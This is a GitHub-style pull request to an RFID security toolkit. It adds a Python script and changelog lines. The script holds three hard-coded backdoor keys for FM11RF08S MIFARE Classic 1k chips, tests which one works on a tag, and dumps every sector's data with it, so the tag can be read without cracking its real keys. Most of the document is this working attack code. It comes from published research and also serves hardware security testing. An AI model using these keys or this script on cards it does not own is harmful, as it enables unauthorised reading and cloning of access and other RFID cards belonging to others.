### PR TITLE
Add mf_backdoor_dump script

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -33,7 +33,7 @@ This project uses the changelog in accordance with [keepchangelog](http://keepac
 - Fixed hardnested on AVX512F #2410 (@xianglin1998)
 - Added `hf 14a aidsim` - simulates a PICC (like `14a sim`), and allows you to respond to specific AIDs and getData responses (@evildaemond)
 - Fixed arguments for `SimulateIso14443aTag` and `SimulateIso14443aInit` in `hf_young.c`, `hf_aveful.c`, `hf_msdsal.c`, `hf_cardhopper.c`, `hf_reblay.c`, `hf_tcprst.c` and `hf_craftbyte.c` (@archi)
-- Added `mf_backdoor_dump.py` script that dumps FM11RF08S and similar (Mifare Classic 1k) tag data that can be directly read by known backdoor keys. 
+- Added `mf_backdoor_dump.py` script that dumps FM11RF08S and similar (Mifare Classic 1k) tag data that can be directly read by known backdoor keys. (@Aptimex)
 
 ## [Backdoor.4.18994][2024-09-10]
 - Changed flashing messages to be less scary (@iceman1001)

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -33,6 +33,7 @@ This project uses the changelog in accordance with [keepchangelog](http://keepac
 - Fixed hardnested on AVX512F #2410 (@xianglin1998)
 - Added `hf 14a aidsim` - simulates a PICC (like `14a sim`), and allows you to respond to specific AIDs and getData responses (@evildaemond)
 - Fixed arguments for `SimulateIso14443aTag` and `SimulateIso14443aInit` in `hf_young.c`, `hf_aveful.c`, `hf_msdsal.c`, `hf_cardhopper.c`, `hf_reblay.c`, `hf_tcprst.c` and `hf_craftbyte.c` (@archi)
+- Added `mf_backdoor_dump.py` script that dumps FM11RF08S and similar (Mifare Classic 1k) tag data that can be directly read by known backdoor keys. 
 
 ## [Backdoor.4.18994][2024-09-10]
 - Changed flashing messages to be less scary (@iceman1001)

--- a/client/pyscripts/mf_backdoor_dump.py
+++ b/client/pyscripts/mf_backdoor_dump.py
@@ -6,6 +6,7 @@
 
 import pm3
 import os
+import sys
 
 TOTAL_SECTORS = 16 #1k chips
 

--- a/client/pyscripts/mf_backdoor_dump.py
+++ b/client/pyscripts/mf_backdoor_dump.py
@@ -1,0 +1,62 @@
+#!/usr/bin/env python3
+
+# Uses the backdoor keys for the FM11RF08S (and similar) chipsets to quickly dump all the data they can read
+# Tested on vulnerable 1k chips only
+# Based on the work in this paper: https://eprint.iacr.org/2024/1275
+
+import pm3
+import os
+
+TOTAL_SECTORS = 16 #1k chips
+
+BACKDOOR_KEYS = ["A396EFA4E24F", "A31667A8CEC1", "518B3354E760"]
+WORKING_KEY = None
+
+required_version = (3, 8)
+if sys.version_info < required_version:
+    print(f"Python version: {sys.version}")
+    print(f"The script needs at least Python v{required_version[0]}.{required_version[1]}. Abort.")
+    exit()
+p = pm3.pm3()
+
+# Test all the keys first to see which one works (if any)
+for bk in BACKDOOR_KEYS:
+    p.console(f"hf mf rdbl -c 4 --key {bk} --blk 0")
+    output = p.grabbed_output.split('\n')
+    
+    if "auth error" in output[0].lower():
+        continue
+    elif "can't select card" in output[0].lower():
+        print("Error reading the tag.")
+        exit()
+    else:
+        WORKING_KEY = bk
+        break
+    
+if not WORKING_KEY:
+    print("None of the backdoor keys seem to work with this tag.")
+    exit()
+
+print(f"Backdoor key {WORKING_KEY} seems to work, dumping data...")
+print("IMPORTANT: Only data blocks and access bytes can be dumped; keys will be shown as all 0's")
+
+header = False
+# Read every sector
+for i in range(TOTAL_SECTORS):
+    p.console(f"hf mf rdsc -c 4 --key {WORKING_KEY} -s {i}")
+    
+    start = False
+    for line in p.grabbed_output.split('\n'):
+        if not header:
+            print(line)
+        elif start and len(line) > 0:
+            print(line)
+            continue
+        
+        if "----------" in line:
+            start = True
+            header = True
+            continue
+        else:
+            continue
+        


### PR DESCRIPTION
Simple python script that uses the backdoor keys from `fm11rf08s_recovery.py` script to quickly dump the tag contents that those keys can directly read. 

Really handy if you just want to read the tag data without waiting 15 minutes to crack the real keys. 